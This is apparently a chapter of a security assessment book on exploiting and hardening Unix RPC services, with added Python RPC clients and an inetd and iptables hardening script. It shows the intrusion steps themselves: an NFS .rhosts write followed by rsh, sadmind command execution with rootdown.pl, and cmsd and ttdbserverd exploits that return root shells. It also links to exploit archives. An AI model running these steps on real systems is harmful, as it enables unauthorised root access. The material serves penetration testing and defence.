Vulnerabilities in Unix RPC services have led to many large organizations falling victim to hackers over the last 10 years. One such incident in April 1999 resulted in the web sites of Playboy, Sprint, O’Reilly Media, Sony Music, Sun Microsystems, and others being mass-defaced by H4G1S and the Yorkshire Posse (HTML mirrored at http://www.2600.com/hackedphiles/current/oreilly/hacked/). In this chapter, I cover remote RPC service vulnerabilities in Solaris, IRIX, and Linux, exploring how these services are exploited in the wild and how you can protect them. In general, these services should not be presented to the public Internet and should be run only when absolutely necessary.
A number of interesting Unix daemons (including NIS+, NFS, and CDE components) run as Remote Procedure Call (RPC) services using dynamically assigned high ports. To keep track of registered endpoints and present clients with accurate details of listening RPC services, a portmapper service listens on TCP and UDP port 111, and sometimes on TCP and UDP port 32771 also.
The RPC portmapper (also known as rpcbind within Solaris) can be queried using the rpcinfo command found on most Unix-based platforms, as shown in Example 13-1.
$ rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
In this example, you can find the following:
status (rpc.statd) on TCP port 32771 and UDP port 32772
nlockmgr (rpc.lockd) on TCP and UDP port 4045
mountd (rpc.mountd) on TCP port 32776 and UDP port 32781
nfsd on UDP port 2049
rquotad on UDP port 32822
rusersd on TCP port 33180 and UDP port 32823
These services can be accessed and queried directly using client software, such as showmount and mount (to access nfsd and mountd), and rusers (to access rusersd, covered in Chapter 5).
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service on port 111 is often filtered while the dynamically assigned service ports are not. Determined attackers therefore scan high port ranges (TCP and UDP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack; filtering the portmapper alone hides the directory, not the services.
You can run Nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible. Nmap does this by sending a NULL procedure call with candidate program numbers to each open port and reading the accept status in the reply. Example 13-2 shows Nmap in use against a Solaris 9 host behind a firewall filtering the portmapper and services below port 1024.
$ nmap -sR 10.0.0.9
Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2007-04-01 20:39 UTC
Interesting ports on 10.0.0.9:
PORT STATE SERVICE VERSION
4045/tcp open nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
6000/tcp open X11
6112/tcp open dtspc
7100/tcp open font-service
32771/tcp open ttdbserverd (ttdbserverd V1) 1 (rpc #100083)
32772/tcp open kcms_server (kcms_server V1) 1 (rpc #100221)
32773/tcp open metad (metad V1) 1 (rpc #100229)
32774/tcp open metamhd (metamhd V1) 1 (rpc #100230)
32775/tcp open rpc.metamedd (rpc.metamedd V1) 1 (rpc #100242)
32776/tcp open rusersd (rusersd V2-3) 2-3 (rpc #100002)
32777/tcp open status (status V1) 1 (rpc #100024)
32778/tcp open sometimes-rpc19
32779/tcp open sometimes-rpc21
32780/tcp open dmispd (dmispd V1) 1 (rpc #300598)
If network access to the RPC portmapper service is filtered and you try to use an RPC client, such as showmount, it will fail, as shown here:
$ showmount -e 10.0.0.9
mount clntudp_create: RPC: Port mapper failure RPC: Unable to receive
Standard RPC clients rely on the portmapper to resolve a program number to the port the service endpoint listens on. To connect to remote RPC endpoints without an available portmapper using such clients, you must run a local RPC portmapper, register the target's program numbers against local ports, and proxy those local ports through to the corresponding high ports on the remote (target) server.
This technique is described by David Routin in his paper at http://www.milw0rm.com/papers/154, and it requires that the following utilities be installed and available on the local RPC attack proxy server:
netcat
inetd
portmap
pmap_set
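The RPC exchanges behind rpcinfo -p, the Nmap -sR probe and a portmapper-less showmount, written out as a small Python client. This is an added example, not code from the book or from any of the tools it mentions. The reply bytes it parses offline are constructed to match the rpcinfo and showmount output in this chapter, and the host and port on its command line are assumed. rpc_call_tcp makes the point the proxy technique above works around: a client that speaks to the endpoint port directly never needs port 111.

```python
# Raw ONC RPC (RFC 5531) client pieces, added as an example (not from the book):
# portmapper DUMP parsing (rpcinfo -p), NULL-call classification of bare high
# ports (nmap -sR) and a MOUNT EXPORT call sent straight to mountd (showmount -e
# without port 111).
import socket
import struct
import sys

MOUNT_PROG, MOUNT_VERS, MOUNT_EXPORT = 100005, 1, 5
ACCEPT_STAT = {0: "SUCCESS", 1: "PROG_UNAVAIL", 2: "PROG_MISMATCH",
               3: "PROC_UNAVAIL", 4: "GARBAGE_ARGS", 5: "SYSTEM_ERR"}

def u32(n):
    return struct.pack(">I", n)

def xdr_str(b):  # XDR string/opaque: length, bytes, zero pad to 4-byte boundary
    return u32(len(b)) + b + b"\0" * (-len(b) % 4)

def read_u32(buf, off):
    return struct.unpack(">I", buf[off:off + 4])[0], off + 4

def read_str(buf, off):
    n, off = read_u32(buf, off)
    return buf[off:off + n].decode(errors="replace"), off + n + (-n % 4)

def read_list(buf, off, read_item):  # XDR optional chain: <1> item ... <0>
    items = []
    while True:
        more, off = read_u32(buf, off)
        if not more:
            return items, off
        item, off = read_item(buf, off)
        items.append(item)

def build_call(xid, prog, vers, proc, args=b""):
    # xid, CALL(0), rpcvers 2, prog, vers, proc, AUTH_NULL cred, AUTH_NULL verf
    return b"".join(u32(v) for v in (xid, 0, 2, prog, vers, proc, 0, 0, 0, 0)) + args

def parse_reply(data):  # -> (xid, accept_stat name, result bytes)
    xid, off = read_u32(data, 0)
    mtype, off = read_u32(data, off)
    reply_stat, off = read_u32(data, off)
    if mtype != 1 or reply_stat != 0:
        raise ValueError("not an accepted REPLY")
    vlen = struct.unpack(">II", data[off:off + 8])[1]  # verifier: flavor, len, body
    stat, off = read_u32(data, off + 8 + vlen + (-vlen % 4))
    return xid, ACCEPT_STAT.get(stat, str(stat)), data[off:]

def read_mapping(buf, off):  # pmap mapping: prog vers prot port
    prog, vers, prot, port = struct.unpack(">IIII", buf[off:off + 16])
    return (prog, vers, {6: "tcp", 17: "udp"}.get(prot, str(prot)), port), off + 16

def parse_pmap_dump(body):
    return read_list(body, 0, read_mapping)[0]

def read_export(buf, off):  # exportnode: dirpath, then the groups chain
    path, off = read_str(buf, off)
    groups, off = read_list(buf, off, read_str)
    return (path, groups or ["(everyone)"]), off

def parse_export_list(body):
    return read_list(body, 0, read_export)[0]

def classify_probe(reply_data, prog):
    """Interpret the reply to a NULL call (proc 0) sent to a bare port with a
    guessed program number; PROG_MISMATCH replies carry the version range."""
    _, stat, body = parse_reply(reply_data)
    if stat == "SUCCESS":
        return "rpc program %d" % prog
    if stat == "PROG_MISMATCH":
        low, high = struct.unpack(">II", body[:8])
        return "rpc program %d, versions %d-%d" % (prog, low, high)
    return "rpc endpoint, not program %d (%s)" % (prog, stat)

def rpc_call_tcp(host, port, prog, vers, proc, args=b"", xid=0x4d41, timeout=5):
    """One call over TCP with record marking, straight to the endpoint port."""
    msg = build_call(xid, prog, vers, proc, args)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(u32(0x80000000 | len(msg)) + msg)  # high bit: last fragment
        f = s.makefile("rb")
        want = struct.unpack(">I", f.read(4))[0] & 0x7FFFFFFF
        return parse_reply(f.read(want))

def accepted_reply(xid, stat, body=b""):  # reply with an AUTH_NULL verifier
    return b"".join(u32(v) for v in (xid, 1, 0, 0, 0, stat)) + body

# Constructed samples, modelled on the rpcinfo and showmount output in the text.
SAMPLE_DUMP = accepted_reply(1, 0, b"".join(
    u32(1) + struct.pack(">IIII", *e) for e in
    [(100000, 2, 6, 111), (100005, 1, 17, 32781), (100024, 1, 6, 32771)]) + u32(0))
SAMPLE_EXPORTS = accepted_reply(2, 0, u32(1) + xdr_str(b"/home") + u32(0) +
    u32(1) + xdr_str(b"/disk0") + u32(1) + xdr_str(b"10.0.0.10") +
    u32(1) + xdr_str(b"10.0.0.11") + u32(0) + u32(0))
SAMPLE_PROBE = accepted_reply(3, 1)  # PROG_UNAVAIL from a bare RPC port

if __name__ == "__main__":  # live: <host> <mountd tcp port>, portmapper not needed
    stat, body = rpc_call_tcp(sys.argv[1], int(sys.argv[2]),
                              MOUNT_PROG, MOUNT_VERS, MOUNT_EXPORT)[1:]
    print(stat, parse_export_list(body) if stat == "SUCCESS" else "")
```

Given a host and a mountd TCP port (the 32776 in Example 13-1, say), the script issues MOUNTPROC_EXPORT to that port and prints the export list that showmount -e would have shown had port 111 been reachable. The grind Nmap performs is the same build_call with proc 0 and a guessed program number against each open high port, with classify_probe applied to the reply: PROG_UNAVAIL still tells you the port speaks RPC, which is why a filtered portmapper does not hide these services.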
Due to the number of different RPC services, associated prognum values, CVE references, and vulnerable platforms, it is difficult to simply group bugs and talk about them individually. I have put together the matrix of popular services and vulnerable platforms shown in Table 13-1. A small number of obscure IRIX services (rpc.xfsmd, rpc.espd, etc.) aren’t listed; you can investigate them through MITRE CVE and other sources.
Program number | Service | CVE references | Exploit support (each ✓ is one of IMPACT, CANVAS, MSF or LSD)
--- | --- | --- | ---
100000 | portmapper | CVE-2007-0736, CVE-1999-0190 |
100003 | nfsd | CVE-1999-0832 |
100004 | ypserv | CVE-2000-1043, CVE-2000-1042 |
100005 | mountd | CVE-2005-0139, CVE-2003-0252, CVE-1999-0002 |
100007 | ypbind | CVE-2001-1328, CVE-2000-1041 | ✓
100008 | rwalld | CVE-2002-0573 | ✓
100009 | yppasswd | CVE-2001-0779 | ✓ ✓
100024 | statd | CVE-2000-0666, CVE-1999-0493, CVE-1999-0019, CVE-1999-0018 | ✓
100028 | ypupdated | CVE-1999-0208 |
100068 | cmsd | CVE-2002-1998 |
 | | CVE-2002-0391 | ✓ (CANVAS)
 | | CVE-1999-0696 | ✓ (LSD)
 | | CVE-1999-0320 |
100083 | ttdbserverd | CVE-2002-0679, CVE-2002-0677 |
 | | CVE-2002-0391, CVE-2001-0717 | ✓ ✓ (IMPACT, CANVAS)
 | | CVE-1999-0003 | ✓ ✓ (including LSD)
100099 | autofsd | CVE-1999-0088 |
100232 | sadmind | CVE-2003-0722, CVE-1999-0977 | ✓ ✓ ✓ (including MSF)
100235 | cachefsd | CVE-2002-0033 | ✓
 | | CVE-2002-0084 | ✓ ✓
100249 | snmpXdmid | CVE-2001-0236 | ✓ ✓ ✓
100300 | nisd | CVE-1999-0795, CVE-1999-0008 |
150001 | pcnfsd | CVE-1999-0078 |
300019 | amd | CVE-1999-0704 |
Two sets of integer overflows were uncovered in 2002 and 2003 relating to XDR functions used in Solaris RPC services and associated components. These issues are listed in MITRE CVE as CVE-2003-0028 and CVE-2002-0391, and because the flaw is in the shared XDR library rather than in any one daemon, they have multiple attack vectors, including cmsd, ttdbserverd, and dmispd.
The LSD entries in Table 13-1 do not relate to an exploitation framework, but to the work of the Last Stage of Delirium (LSD) research team. LSD published reliable standalone exploits for the issues so marked in Table 13-1, available as ZIP archives (solaris.zip and irix.zip) from http://lsd-pl.net/code/ and mirrored in the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/.
Exploits for vulnerabilities that are not covered by CORE IMPACT, Immunity CANVAS, MSF, or LSD are listed in the following sections of this chapter.
Three serious remotely exploitable bugs have been identified in the mountd and nfsd service binaries that are bundled with older Linux distributions (primarily Red Hat and Debian). The MITRE CVE references for these bugs are CVE-2003-0252, CVE-1999-0832, and CVE-1999-0002. Many DoS issues exist in recent NFS implementations, which you can investigate by checking MITRE CVE (http://cve.mitre.org).
In July 2003, an off-by-one bug was identified in the xlog( ) function of the mountd service bundled with multiple Linux distributions (including Debian 3.0, Slackware 8.1, and Red Hat Linux 6.2) as part of the nfs-utils-1.0.3 package. An exploit script for this issue is available at http://www.newroot.de/projects/mounty.c.
A second remotely exploitable issue was identified in Red Hat Linux 5.2 and Debian 2.1 and earlier relating to the rpc.nfsd service (as part of the nfs-server-2.2beta46 package) in November 1999. An exploit script for this issue is available at http://examples.oreilly.com/networksa/tools/rpc_nfsd2.c.
In October 1998, a serious remotely exploitable vulnerability was found in the NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package). Other Linux distributions were also found to be vulnerable, along with IRIX. Exploit scripts for this issue are available at:
http://examples.oreilly.com/networksa/tools/ADMmountd.tgz
http://examples.oreilly.com/networksa/tools/rpc.mountd.c
If the mountd service is running, you can use the Unix showmount command to list exported directories on the target host. These directories can be accessed and manipulated using the mount command and other NFS client utilities. In Example 13-3, I use showmount to query a Solaris 2.6 host at 10.0.0.6 and, by writing a .rhosts file to a user’s home directory, gain remote access privileges. Two conditions make this work: /home is exported to everyone, and the write into jarvis’s home directory (mode 711, owned by jarvis) succeeds only because the server does not map the client’s root user to nobody (no root squashing). Where root squashing is enabled, the same result is obtained by creating a local account with the target user’s UID, because NFS with AUTH_SYS trusts the UID the client presents. The final step also requires the target to run rshd and honor .rhosts.
$ showmount -e 10.0.0.6
Export list for 10.0.0.6:
/home      (everyone)
/usr/local onyx.trustmatta.com
/disk0     10.0.0.10,10.0.0.11
$ mount 10.0.0.6:/home /mnt
$ cd /mnt
$ ls -la
total 44
drwxr-x---  17 root    root     512 Jun 26 09:59 .
drwxr-xr-x   9 root    root     512 Oct 12 03:25 ..
drwx------   4 chris   users    512 Sep 20  2002 chris
drwxr-x---   4 david   users    512 Mar 12  2003 david
drwx------   3 chuck   users    512 Nov 20  2002 chuck
drwx--x--x   8 jarvis  users   1024 Oct 31 13:15 jarvis
$ cd jarvis
$ echo + + > .rhosts
$ cd /
$ umount /mnt
$ rsh -l jarvis 10.0.0.6 csh -i
Warning: no access to tty; thus no job control in this shell...
dockmaster%
In recent years, four serious remotely exploitable bugs have been identified in the NFS status service (known as rpc.statd on most Unix-based platforms, and not to be confused with rpc.rstatd). These bugs are listed in Table 13-2, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.
CVE reference(s) | Affected platforms | Exploit scripts
--- | --- | ---
CVE-2000-0666 | Red Hat 6.2, Mandrake 7.1, and other Linux distributions | lsx.tgz, statdx2.tar.gz, and rpc-statd.c
CVE-1999-0493 | Solaris 2.5.1 | statd.tar.gz
CVE-1999-0018 and CVE-1999-0019 | Solaris 2.4, IRIX, AIX, and HP-UX | dropstatd (Solaris binary)
The Sun Solstice AdminSuite Daemon (sadmind) is enabled by default on Solaris 2.5.1 and later (up to Solaris 9 at the time of writing). sadmind has been found to be remotely vulnerable to two serious issues over recent years; they are known within MITRE CVE as CVE-1999-0977 and CVE-2003-0722.
The sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow. Two exploits are effective at compromising vulnerable Solaris instances on Intel (x86) and SPARC architectures and are available at:
http://examples.oreilly.com/networksa/tools/super-sadmind.c
http://examples.oreilly.com/networksa/tools/sadmind-brute.c
A more recent bug, identified in September 2003, relates to authentication within sadmind. By default, the sadmind service runs in a weak security mode known as AUTH_SYS. In this mode, sadmind accepts command requests containing the user and group IDs, as well as the originating system name. These values are supplied by the client and are not validated by the sadmind service, so you can gain access to a vulnerable system by sending a crafted RPC request that simply asserts a privileged identity. Because this bug doesn’t rely on memory corruption, it is exploited very easily and is unaffected by proactive mechanisms that may be in use, such as stack protection.
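What an AUTH_SYS credential actually carries, as an added example that is not from the book, rootdown.pl or sadmind: the encoder builds the opaque_auth an RPC client places in the call header, the decoder shows exactly what a server running in this mode gets to see, and is_trustworthy is the policy a hardened service would apply before a privileged operation. The hostname "onyx" and the stamp value are assumed. Nothing here talks to sadmind; it only shows why a service that authorizes on these fields is trusting whatever the client chose to send.

```python
# AUTH_SYS (a.k.a. AUTH_UNIX, flavor 1) credential as laid out in RFC 5531
# section 8.1.1; added example, not from the book, rootdown.pl or sadmind.
import struct
import time

AUTH_NULL, AUTH_SYS, AUTH_DES, RPCSEC_GSS = 0, 1, 3, 6

def _u32(n):
    return struct.pack(">I", n)

def _xdr_str(s):
    b = s.encode()
    return _u32(len(b)) + b + b"\0" * (-len(b) % 4)

def auth_sys_cred(machinename, uid, gid, gids=(), stamp=None):
    """Encode opaque_auth {flavor, body} carrying authsys_parms. Every field
    is chosen by the sender; nothing in it is signed or otherwise verifiable."""
    if stamp is None:
        stamp = int(time.time()) & 0xFFFFFFFF
    if len(machinename.encode()) > 255 or len(gids) > 16:
        raise ValueError("authsys_parms: name <= 255 bytes, at most 16 gids")
    body = (_u32(stamp) + _xdr_str(machinename) + _u32(uid) + _u32(gid) +
            _u32(len(gids)) + b"".join(_u32(g) for g in gids))
    return _u32(AUTH_SYS) + _u32(len(body)) + body

def parse_opaque_auth(buf, off=0):
    """Decode one opaque_auth at buf[off:]; for AUTH_SYS also unpack the
    asserted identity. Returns (dict, offset just past the credential)."""
    flavor, blen = struct.unpack(">II", buf[off:off + 8])
    body = buf[off + 8:off + 8 + blen]
    end = off + 8 + blen + (-blen % 4)
    if flavor != AUTH_SYS:
        return {"flavor": flavor, "body": body}, end
    stamp, n = struct.unpack(">II", body[:8])
    name = body[8:8 + n].decode(errors="replace")
    p = 8 + n + (-n % 4)
    uid, gid, ngids = struct.unpack(">III", body[p:p + 12])
    gids = list(struct.unpack(">%dI" % ngids, body[p + 12:p + 12 + 4 * ngids]))
    return {"flavor": flavor, "stamp": stamp, "machinename": name,
            "uid": uid, "gid": gid, "gids": gids}, end

def is_trustworthy(cred):
    """Policy a hardened RPC service applies before a privileged operation:
    AUTH_NULL and AUTH_SYS can claim uid 0 from any host at no cost, so only
    a cryptographically verified flavor (AUTH_DES, RPCSEC_GSS) qualifies."""
    return cred["flavor"] in (AUTH_DES, RPCSEC_GSS)

if __name__ == "__main__":
    # Constructed: a client claiming root on a host named "onyx" (assumed name).
    cred = auth_sys_cred("onyx", 0, 0, (1, 2, 3), stamp=1)
    parsed, _ = parse_opaque_auth(cred)
    print(parsed, "trustworthy:", is_trustworthy(parsed))
```

The decoded dictionary is everything a server in AUTH_SYS mode has to go on: a stamp, a machine name, and numeric IDs, all typed by the client. That is adequate for NFS-style accounting on a trusted LAN and worthless as authentication, which is the whole of the sadmind issue above.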
H D Moore wrote a Perl exploit script called rootdown.pl, available at http://www.metasploit.com/tools/rootdown.pl. This script has been integrated into MSF and can be run from the framework with ease.
Example 13-4 shows the rootdown.pl script in use against a Solaris 9 server at 10.0.0.9. As shown in Example 13-4, you can write "+ +" into a user’s .rhosts file (the bin user in this case, whose home directory on Solaris is /usr/bin) to easily gain access.
$ perl rootdown.pl -h 10.0.0.9 -i
sadmind> echo + + > /usr/bin/.rhosts
Success: your command has been executed successfully.
sadmind> exit
Exiting interactive mode...
$ rsh -l bin 10.0.0.9 csh -i
Warning: no access to tty; thus no job control in this shell...
onyx% uname -a
SunOS onyx 5.9 Generic_112234-08 i86pc i386 i86pc
In recent years, four serious remotely exploitable bugs have been identified in the CDE Calendar Manager Service Daemon (CMSD), known as rpc.cmsd on most Unix-based platforms. These bugs are listed in Table 13-3, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.
CVE reference | Affected platforms | Exploit scripts
--- | --- | ---
CVE-2002-1998 | SCO UnixWare 7.1.1 and OpenUnix 8.0.0 | unixware_cmsd.c
CVE-2002-0391 | Solaris 9 and other BSD-derived platforms | (Immunity CANVAS supports these exploits)
CVE-1999-0696 | Solaris 2.7, HP-UX 11.00, Tru64 4.0f, and SCO UnixWare 7.1.0 | lsd_cmsd.c and cmsd.tgz
CVE-1999-0320 | Solaris 2.5.1 and SunOS 4.1.4 | N/A
Example 13-5 shows the usage of the compiled cmsd exploit (found in cmsd.tgz).
$ ./cmsd
usage: cmsd [-s] [-h hostname] [-c command] [-u port] [-t port] version host
-s: just start up rpc.cmsd (useful with a firewalled portmapper)
-h: (for 2.6) specifies the hostname of the target
-c: specifies an alternate command
-u: specifies a port for the udp portion of the attack
-t: specifies a port for the tcp portion of the attack
Available versions:
1: Solaris 2.5.1 /usr/dt/bin/rpc.cmsd 338844 [2-5]
2: Solaris 2.5.1 /usr/openwin/bin/rpc.cmsd 200284 [2-4]
3: Solaris 2.5 /usr/openwin/bin/rpc.cmsd 271892 [2-4]
4: Solaris 2.6 /usr/dt/bin/rpc.cmsd 347712 [2-5]
5: Solaris 7 /usr/dt/bin/rpc.cmsd
6: Solaris 7 /usr/dt/bin/rpc.cmsd (2)
7: Solaris 7 (x86) .../dt/bin/rpc.cmsd 329080 [2-5]
8: Solaris 2.6_x86 .../dt/bin/rpc.cmsd 318008 [2-5]
For the exploit to work, you must build an RPC request that includes the local hostname (also known as the RPC cache name) of the target server. Under Solaris, there are a number of services that give away the hostname, including FTP, as shown here:
$ ftp 10.0.0.6
Connected to 10.0.0.6.
220 dockmaster FTP server (SunOS 5.6) ready.
Name (10.0.0.6:root):
After obtaining both the hostname and version of Solaris running on the target host, you can launch the cmsd exploit. If no command is specified, the tool binds /bin/sh to TCP port 1524, as shown in Example 13-6.
$ ./cmsd -h dockmaster 4 10.0.0.6
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection reset by peer
$ telnet 10.0.0.6 1524
Trying 10.0.0.6...
Connected to 10.0.0.6.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
In recent years, four serious remotely exploitable bugs have been identified in the ToolTalk Database (TTDB) service, known as rpc.ttdbserverd on most Unix-based platforms. These bugs are listed in Table 13-4, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.
CVE reference | Affected platforms | Exploit scripts
--- | --- | ---
CVE-2002-0679 | Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0 | N/A
CVE-2002-0677 | Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0 | N/A
CVE-2002-0391 | Solaris 9 and other BSD-derived platforms | (Immunity CANVAS and CORE IMPACT support these exploits)
CVE-2001-0717 | Solaris 8, HP-UX 11.11, Tru64 5.1A, AIX 5.1, and IRIX 6.4 | N/A
CVE-1999-0003 | Solaris 2.6, HP-UX 11.0, and IRIX 6.5.2 | lsd_irix_ttdb.c and lsd_sol_ttdb.c
Example 13-7 shows the LSD TTDB exploit in use against a Solaris 2.6 host at 10.0.0.6.
$ ./lsd_sol_ttdb
copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/
rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc
usage: ./lsd_solttdb address [-s|-c command] [-p port] [-v 6]
$ ./lsd_sol_ttdb 10.0.0.6 -v 6
copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/
rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc
adr=0xeffffaf8 timeout=10 port=32785 connected! sent!
SunOS dockmaster 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
id
uid=0(root) gid=0(root)
The following countermeasures should be considered when hardening RPC services:
Don’t run rexd, rusersd, or rwalld RPC services because they are of minimal use and provide attackers with both useful information and direct access to your hosts.
In high-security environments, don’t offer any RPC services to the public Internet. Due to the complexity of these services, it is highly likely that zero-day exploit scripts will be available to attackers. RPC services should be filtered and disabled wherever possible, and should only be run where absolutely necessary.
To minimize the risk of internal or trusted attacks against necessary RPC services (such as NFS components, including statd, lockd, and mountd), install the latest vendor security patches. Where NFS must be offered, export to explicit hosts or netgroups rather than to everyone, read-only where possible, and keep root squashing on so that a client’s root user cannot write into home directories as in Example 13-3.
Aggressively filter egress traffic, where possible, to ensure that even if an attack against an RPC service is successful, a connect-back shell can’t be spawned to the attacker.
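A hardening check for the first three points above, as an added shell example that is not from the book: it audits a Solaris-style inetd.conf for rexd, rusersd and rwalld, writes a copy with them disabled, and prints Linux iptables rules that admit RPC only from one trusted subnet and deny new outbound connections, so a successful exploit has nowhere to connect back to. The inetd.conf contents are constructed in the Solaris 9 layout, the 10.0.0.0/24 trusted subnet is assumed, and a Solaris host would need the equivalent rules in its own packet filter rather than iptables.

```shell
#!/bin/sh
# Added example, not from the book: audit a Solaris-style inetd.conf for the
# RPC services the countermeasures say not to run, write a copy with them
# disabled, and print iptables rules that admit RPC only from a trusted subnet
# and block new outbound connections. inetd.conf content and addresses are
# constructed for illustration.

# inetd.conf service names differ from daemon names: rwalld is listed as walld.
RISKY_RPC='^(rexd|rusersd|walld)/'

# Print the enabled (uncommented) risky RPC entries in an inetd.conf.
find_risky_rpc() {
    grep -E "$RISKY_RPC" "$1"
}

# Write a copy of inetd.conf with the risky entries commented out; the
# original is left untouched so it can be diffed before inetd is HUPed.
disable_risky_rpc() {
    sed -E "s,$RISKY_RPC,#&," "$1" > "$2"
}

# iptables rules for a host that must offer NFS to one subnet only. The
# 32771-34000 range is the Solaris one from the text; adjust to the host's
# real dynamic RPC range. Outbound NEW connections are allowed only to the
# trusted subnet (lockd/statd callbacks), everything else outbound is dropped;
# add explicit exceptions (DNS, NTP, syslog) before relying on this.
rpc_filter_rules() {
    trusted=$1
    cat <<EOF
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -s $trusted -p tcp -m multiport --dports 111,2049,4045 -j ACCEPT
iptables -A INPUT -s $trusted -p udp -m multiport --dports 111,2049,4045 -j ACCEPT
iptables -A INPUT -s $trusted -p tcp --dport 32771:34000 -j ACCEPT
iptables -A INPUT -s $trusted -p udp --dport 32771:34000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dports 111,2049,4045 -j DROP
iptables -A INPUT -p udp -m multiport --dports 111,2049,4045 -j DROP
iptables -A INPUT -p tcp --dport 32771:34000 -j DROP
iptables -A INPUT -p udp --dport 32771:34000 -j DROP
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -d $trusted -j ACCEPT
iptables -P OUTPUT DROP
EOF
}

# Constructed inetd.conf fragment in the Solaris 9 layout (name/versions,
# endpoint type, rpc/protocols, wait flag, user, path, args).
sample_inetd_conf() {
    cat > "$1" <<'EOF'
ftp          stream tcp6 nowait root /usr/sbin/in.ftpd in.ftpd -a
rusersd/2-3  tli rpc/datagram_v,circuit_v wait root /usr/lib/netsvc/rusers/rpc.rusersd rpc.rusersd
walld/1      tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld
rexd/1       tli rpc/tcp wait root /usr/sbin/rpc.rexd rpc.rexd
#sprayd/1    tli rpc/datagram_v wait root /usr/lib/netsvc/spray/rpc.sprayd rpc.sprayd
100232/10    tli rpc/udp wait root /usr/sbin/sadmind sadmind
EOF
}

if [ "${1:-}" = demo ]; then
    conf=$(mktemp) && fixed=$(mktemp)
    sample_inetd_conf "$conf"
    echo "enabled risky RPC services:"; find_risky_rpc "$conf"
    disable_risky_rpc "$conf" "$fixed"
    echo "after:"; grep -E '^#?(rexd|rusersd|walld)/' "$fixed"
    rpc_filter_rules 10.0.0.0/24
    rm -f "$conf" "$fixed"
fi
```

Run with the argument demo to see the audit against the constructed file; on a real host, point find_risky_rpc at /etc/inetd.conf, review the diff of the disabled copy, then install it and signal inetd. The sadmind line is left alone by the audit on purpose: it is in the table of exploitable services above, but it is an administrative dependency on some hosts and should be disabled as a considered decision rather than by pattern.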